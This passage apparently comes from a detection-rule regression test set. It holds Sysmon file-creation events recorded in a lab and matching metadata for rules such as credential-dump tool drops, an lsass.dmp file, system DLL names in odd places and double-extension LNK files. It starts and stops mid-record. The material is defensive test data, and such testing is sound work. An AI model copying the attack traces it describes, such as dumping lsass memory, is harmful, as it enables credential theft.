\"5AA13A44-523E-68FB-1700-000000004002\",\n      \"ProcessId\": 1276,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\svchost.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Documents\\\\fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx\",\n      \"CreationUtcTime\": \"2025-10-24 23:36:52.320\",\n      \"User\": \"NT AUTHORITY\\\\LOCAL SERVICE\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml",
    "content": "id: afb1a75a-79c0-451e-b2dc-cb14fdc0e7ef\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 65236ec7-ace0-4f0c-82fd-737b04fd4dcb\n      title: EVTX Created In Uncommon Location\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:38:31.938519Z\"\n        }\n      },\n      \"EventRecordID\": 20972,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:38:31.936\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll\",\n      \"CreationUtcTime\": \"2025-10-24 23:38:31.936\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml",
    "content": "id: 8da08693-5638-4236-87b1-d04b4fcc5e84\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: df6ecb8b-7822-4f4b-b412-08f524b4576c\n      title: Creation Of Non-Existent System DLL\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:39:53.705006Z\"\n        }\n      },\n      \"EventRecordID\": 22566,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:39:53.699\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Windows\\\\apppatch\\\\CustomSDB\\\\my_custom.sdb\",\n      \"CreationUtcTime\": \"2025-10-24 23:39:53.699\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml",
    "content": "id: 094a2fb2-b1fd-4943-9379-c25e7ddb7136\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: ee63c85c-6d51-4d12-ad09-04e25877a947\n      title: New Custom Shim Database Created\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:41:00.601559Z\"\n        }\n      },\n      \"EventRecordID\": 23503,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:41:00.589\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\tdh.dll\",\n      \"CreationUtcTime\": \"2025-10-24 23:41:00.589\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml",
    "content": "id: 61017761-38ab-4224-a43f-6cc53b67e374\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 13c02350-4177-4e45-ac17-cf7ca628ff5e\n      title: Files With System DLL Name In Unsuspected Locations\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:41:48.497170Z\"\n        }\n      },\n      \"EventRecordID\": 24322,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:41:48.482\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\bitsadmin.exe\",\n      \"CreationUtcTime\": \"2025-10-24 23:41:48.482\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/info.yml",
    "content": "id: e0123384-7d25-4178-b011-c1d37394d8dc\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d\n      title: Files With System Process Name In Unsuspected Locations\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:43:34.136421Z\"\n        }\n      },\n      \"EventRecordID\": 26359,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:43:34.134\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\procdump64.exe\",\n      \"CreationUtcTime\": \"2025-10-24 23:43:34.134\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": 
\"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:43:34.154339Z\"\n        }\n      },\n      \"EventRecordID\": 26362,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:43:34.145\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\procdump64.exe:Zone.Identifier\",\n      \"CreationUtcTime\": \"2022-11-03 15:55:14.000\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:43:34.160852Z\"\n        }\n      },\n      \"EventRecordID\": 26366,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n 
     \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:43:34.145\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\procdump64a.exe\",\n      \"CreationUtcTime\": \"2025-10-24 23:43:34.145\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:43:34.177439Z\"\n        }\n      },\n      \"EventRecordID\": 26369,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:43:34.177\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\procdump64a.exe:Zone.Identifier\",\n      
\"CreationUtcTime\": \"2022-11-03 15:55:14.000\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:43:34.183790Z\"\n        }\n      },\n      \"EventRecordID\": 26373,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:43:34.178\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\procdump.exe\",\n      \"CreationUtcTime\": \"2025-10-24 23:43:34.178\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 
2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:43:34.211790Z\"\n        }\n      },\n      \"EventRecordID\": 26376,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:43:34.209\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\procdump.exe:Zone.Identifier\",\n      \"CreationUtcTime\": \"2022-11-03 15:55:14.000\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml",
    "content": "id: ef67d58b-a7c2-434f-af87-34ae280a2968\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 8fbf3271-1ef6-4e94-8210-03c2317947f6\n      title: Cred Dump Tools Dropped Files\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:45:24.807660Z\"\n        }\n      },\n      \"EventRecordID\": 28881,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:45:24.804\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\lsass.dmp\",\n      \"CreationUtcTime\": \"2025-10-24 23:45:24.804\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml",
    "content": "id: 5640730a-30d1-4aca-9ad3-dbb9000bb091\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: aba15bdd-657f-422a-bab3-ac2d2a0d6f1c\n      title: Potentially Suspicious DMP/HDMP File Creation\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/1cf465a1-2609-4c15-9b66-c32dbe4bfd67.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-10T05:14:28.844323Z\"\n        }\n      },\n      \"EventRecordID\": 18792,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"Public\",\n      \"UtcTime\": \"2025-12-10 05:14:28.840\",\n      \"ProcessGuid\": \"0197231E-01A8-6939-0811-000000000800\",\n      \"ProcessId\": 8868,\n      \"Image\": \"C:\\\\WINDOWS\\\\system32\\\\certutil.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Public\\\\7zip.exe\",\n      \"CreationUtcTime\": \"2025-12-10 05:14:28.840\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/info.yml",
    "content": "id: 27565138-af8e-4c92-956e-586bbc0a3539\ndescription: N/A\ndate: 2025-12-10\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67\n      title: Legitimate Application Writing Files In Uncommon Location\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/1cf465a1-2609-4c15-9b66-c32dbe4bfd67.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:54:01.546728Z\"\n        }\n      },\n      \"EventRecordID\": 86290,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:54:01.546\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\evil.doc.lnk\",\n      \"CreationUtcTime\": \"2025-10-24 23:54:01.546\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml",
    "content": "id: fbe93ba9-3124-4488-b6d8-ca3f7bb34c4b\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 3215aa19-f060-4332-86d5-5602511f3ca8\n      title: Suspicious LNK Double Extension File Created\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:52:38.278829Z\"\n        }\n      },\n      \"EventRecordID\": 74174,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:52:38.276\",\n      \"ProcessGuid\": 